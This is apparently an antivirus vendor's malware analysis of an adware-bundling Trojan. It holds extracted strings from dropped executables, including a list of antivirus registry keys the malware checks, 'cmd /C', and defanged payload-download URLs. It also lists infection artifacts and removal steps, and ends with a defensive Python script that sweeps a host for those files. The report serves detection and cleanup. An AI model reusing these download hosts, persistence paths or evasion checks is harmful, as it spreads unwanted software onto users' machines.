419#O|V^0*S^0*E^0*EV1^0*T^0,B1|C*F*I,F1|Mail.Ru\MailRuUpdater.exe,F1|Amigo\Application\amigo.exe,RE2|Amigo,RR2|IM^330,RE3|Clients\StartMenuInternet\amigo.exe,RE3|Microsoft\MediaPlayer\ShimInclusionList\amigo.exe,RE3|Microsoft\Windows\CurrentVersion\App Paths\amigo.exe
422#D|2A^0,RE3|webssearchesSoftware\webssearcheshp,RE3|qone8Software\qone8hp,RE3|awesomehpSoftware\awesomehphp,RE3|aartemisSoftware\aartemishp,RE3|sweet-pageSoftware\sweet-pagehp,RE3|omiga-plusSoftware\omiga-plushp,RE3|vi-viewSoftware\vi-viewhp,RE3|istartsurfSoftware\istartsurfhp,RE3|mystartsearchSoftware\mystartsearchhp,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast
432#B1|F,RE3|SiteSee,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|ZoomWebLists
460#RE2|InstalledBrowserExtensions\32846,RE2|ESET,RE2|Malwarebytes' Anti-Malware,RE2|Malwarebytes,RE2|Avira,RE2|Fortinet\FortiClient,RE2|AVG,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malware,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|AVG,RE3S|Avira
575#O|V^0*S^0*E^0*EV1^0*T^0,B1|I,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Softwa

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

taeako.exe_372:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
RegCreateKeyTransactedA
RegOpenKeyTransactedA
RegDeleteKeyTransactedA
Advapi32.dll
RegDeleteKeyExA
GetProcessHeap
KERNEL32.dll
USER32.dll
RegDeleteKeyA
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExA
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
GetCPInfo
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL

tae3ko.exe_1932:

.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessWindowStation
operator
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
GetCPInfo
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
combase.dll
@mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe

dag17797.exe_552:

.text
`.rdata
@.data
.ndata
.rsrc
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\nsCBHTML5.dll
hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
ttp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\nsCBHTML5.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp
tware\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
\Windows\CurrentVersion\Uninstall\avast
Nullsoft Install System v11-Jul-2014.cvs
GetProcessHeap
OLEAUT32.dll
WININET.dll
MSVCRT.dll
nsWeb.dll
nsd5.tmp
2.html?
/cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
2~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
1454464
ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\tmp30731\dag17797.exe"
{EEEE69B8-2C42-4825-B8E6-9597957D672B}
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
ft Windows XP
"%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe"
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731
dag17797.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe
1638692
738853988
1310942
1114350
1048822
1310906
194.242.96.218_2015-09-08_00:22:25
422~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
ttp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
1245428
872744016
1114338
hXXp://VVV.fcesneim.us/FCL_Co_Unq_remote_v5.php
hXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php
\Program Files\Internet Explorer\iexplore.exe" -nohome
hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php
hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip
hXXp://VVV.djapp.info/?file=bundle
hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip
O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
576#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
RE3|Opera Software
Opera
.96.218_2015-09-08_00:22:25
iliateId.php
mote.php
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\FirstResult.txt
76#O|V^0*S^0*E^0*EV1^0*T^0,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
tp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip
p_17970.exe
djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01
systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
Default,RE2|Opera Software,RE3|Opera Software
oudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v11-Jul-2014.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
hXXp://VVV.microsoft.com

dag17797.exe_552_rwx_10004000_00001000:

callback%d

taedko.exe_1604:

.text
`.rdata
@.data
.rsrc
@.reloc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
%s\data
%s%s.js
jquery4toolbar.js
content/jquery4toolbar.js
TrayIcons/logo.ico
logo.ico
In CallJS -> %s
In CallJS.Invoke -> 0xX
in DispInvoke: Searching -> %s
atiexecute
-exe "%s"
..\GetStylesUpdater.exe
%s%s.exe
chrome.exe
%s --new-window --app-window-size=%d,%d --app="%s"
cmd /C %s
http\shell\open\command
chrome
firefox
opera
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
%sTrayIcons\
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
close://close.it/
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
Chrome_WidgetWin_1
MozillaWindowClass
%s%s%s%s%s%s%s%s%s%s%s%s%s%s
hXXp://
%s%s%s%s%s%s%s%s%s%s%s%s
\\.\pipe\61FDC17A-A7B6-4BEB-9B8E-1709DF12376C
%s%s.dat
advapi32.dll
RegDeleteKeyA
%sLow
RegDeleteKeyExA
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s
%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
RegCreateKeyTransactedA
RegOpenKeyTransactedA
RegDeleteKeyTransactedA
Advapi32.dll
GetProcessHeap
CreateIoCompletionPort
CreateNamedPipeA
ConnectNamedPipe
DisconnectNamedPipe
KERNEL32.dll
EnumWindows
USER32.dll
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegEnumKeyExA
RegCreateKeyExA
RegOpenKeyW
RegQueryInfoKeyW
RegOpenKeyA
RegEnumKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
URLDownloadToCacheFileA
urlmon.dll
gdiplus.dll
OLEACC.dll
GetCPInfo
zcÁ
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
9!919;9_9
283F3a3~3
4'454-8@8
4'444=4{:
combase.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
update.exe
%s\Volatile Environment
.default
S-%d-%x-%lu-%lu-%lu-%lu-%lu-%lu-%lu-%lu
{8856F961-340A-11D0-A96B-00C04FD705A2}


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager). The process IDs below are the ones observed during the analysis run and will differ on an infected host; match on the image name instead:

    %original file name%.exe:924
    taeako.exe:900
    taeako.exe:2352
    taeako.exe:212
    taeako.exe:972
    taeako.exe:948
    taeako.exe:2980
    taeako.exe:2644
    taeako.exe:1536
    taeako.exe:544
    taeako.exe:436
    taedko.exe:1988

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.dll (39329 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\utaujte.js (1447 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (14 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (101002 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (902 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\adblocker_installer__1441686123.txt (16441 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (10136 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.dll (20416 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\tae3kod.dll (20416 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\content\khkiaff.js (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\TrayIcons\logo.ico (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (4992 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (569 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.exe (4992 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\tae6kod.dll (39329 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\utils.exe (9527 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\content\narhokgeb.js (6 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\taewko.exe (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\narhokgeb.js (6 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\taeadko.bnp (14184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\khkiaff.js (1856 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\content\utaujte.js (1447 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\taewdko.bnp (6584 bytes)
    %Documents and Settings%\All Users\Application Data\IlejwTivc\content\jquery4toolbar.js (3312 bytes)
    %WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
    %WinDir%\Tasks\Tempo Runner tae6ko.job (8112 bytes)
    %WinDir%\Tasks\Tempo Runner taedko.job (2704 bytes)
    %WinDir%\Tasks\Tempo adblocker Runner.job (920 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\lgv[1].js (122 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_gb (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_expire (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_gb (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cmp_ext[1].js (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\obbgint[1].js (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_gb (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58 (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ammbg[1].js (137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_gb (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_expire (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b (137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_expire (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_expire (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_expire (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cxeappconf[1].js (482 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getcc[1].php (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\v1[1].htm (161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ammapp[1].js (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_expire (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_gb (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_gb (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92 (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_gb (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\loader[1].js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_expire (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer2.zip (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\inner.png (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\blowfish.dll (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_12.html (1681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Math.dll (2489 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer1.zip (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\FirstResult.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\registry.dll (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\SecondResult.txt (611 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll (1660 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsisunz.dll (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\serlib.dll (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\img12_1.jpg (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (611 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_422.html (1969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\header.bmp (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\manlib.dll (26 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\GetVersion.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsDialogs.dll (9 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
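To turn the file list in step 3 into a repeatable check instead of a by-hand search, here is an added example; it is not part of the Lavasoft report or of the Ad-Aware tooling. It parses lines in the report's own `<path> (<n> bytes)` form, expands the `%Documents and Settings%`, `%current user%` and `%WinDir%` placeholders into concrete directories, and reports which listed files are present and whether their sizes match the report. The placeholder mapping in `xp_mapping`, the user name, the drive root and the `Tempo*.job` glob in `find_tempo_jobs` are assumptions made for this example; the sample lines are copied from this page's removal list.

```python
"""IOC sweep built from the report's 'files created/modified' list.

Added example, not part of the Lavasoft report or its tooling. It parses
report lines of the form  <path with %placeholders%> (<n> bytes),
expands the placeholders into concrete directories and checks which of
the listed files exist (and whether their sizes match) under a root.
The placeholder-to-directory mapping is an assumption about the Windows
XP layout the report was generated on; adjust it for other hosts.
"""
import os
import re
from pathlib import Path

# Constructed sample input: four lines copied from the report's removal list.
SAMPLE_REPORT_LINES = [
    r"%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)",
    r"%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)",
    r"%WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)",
]

LINE_RE = re.compile(r"^\s*(?P<path>.+?)\s+\((?P<size>\d+) bytes\)\s*$")
PLACEHOLDER_RE = re.compile(r"%[^%\\]+%")


def parse_report_line(line):
    """Return (raw_path, expected_size) for a report line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return m.group("path"), int(m.group("size"))


def xp_mapping(root, user):
    """Assumed placeholder values for an XP-style layout rooted at `root`."""
    root = Path(root)
    return {
        "%Documents and Settings%": str(root / "Documents and Settings"),
        "%current user%": user,
        "%WinDir%": str(root / "WINDOWS"),
    }


def expand_placeholders(raw_path, mapping):
    """Substitute every known %token%; unknown tokens are left untouched."""
    expanded = PLACEHOLDER_RE.sub(lambda m: mapping.get(m.group(0), m.group(0)), raw_path)
    # The report uses backslashes; normalise so the sweep also runs over a mounted image.
    return expanded.replace("\\", os.sep)


def sweep(lines, mapping):
    """Check each listed file. Returns one dict per parsed line with presence and size match."""
    findings = []
    for line in lines:
        parsed = parse_report_line(line)
        if parsed is None:
            continue
        raw, expected = parsed
        path = Path(expand_placeholders(raw, mapping))
        present = path.is_file()
        actual = path.stat().st_size if present else None
        findings.append({
            "path": str(path),
            "expected_size": expected,
            "present": present,
            "size_matches": present and actual == expected,
        })
    return findings


def find_tempo_jobs(windir):
    """Assumed generalisation: the report's task files all start with 'Tempo' and end in .job."""
    tasks = Path(windir) / "Tasks"
    return sorted(p.name for p in tasks.glob("Tempo*.job")) if tasks.is_dir() else []


if __name__ == "__main__":
    # Assumed drive root and user name; point these at a live system or a mounted image.
    mapping = xp_mapping("C:\\", "Administrator")
    for finding in sweep(SAMPLE_REPORT_LINES, mapping):
        if finding["present"]:
            tag = "MATCH " if finding["size_matches"] else "SIZE? "
            print(tag + finding["path"])
    print("Tempo*.job tasks:", find_tempo_jobs("C:\\WINDOWS"))
```

Point `xp_mapping` at the drive root of the live system or a mounted image and feed it the full list from step 3. A miss on the `ns*.tmp` entries is not evidence the host is clean: those NSIS temp directory names change between runs (this one report shows nsk3.tmp, nsp2.tmp and nsd5.tmp), so the persistent artifacts, the `IlejwTivc` and `kuhcaooqr` directories and the `Tempo ... .job` task files, are the entries worth keying on.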
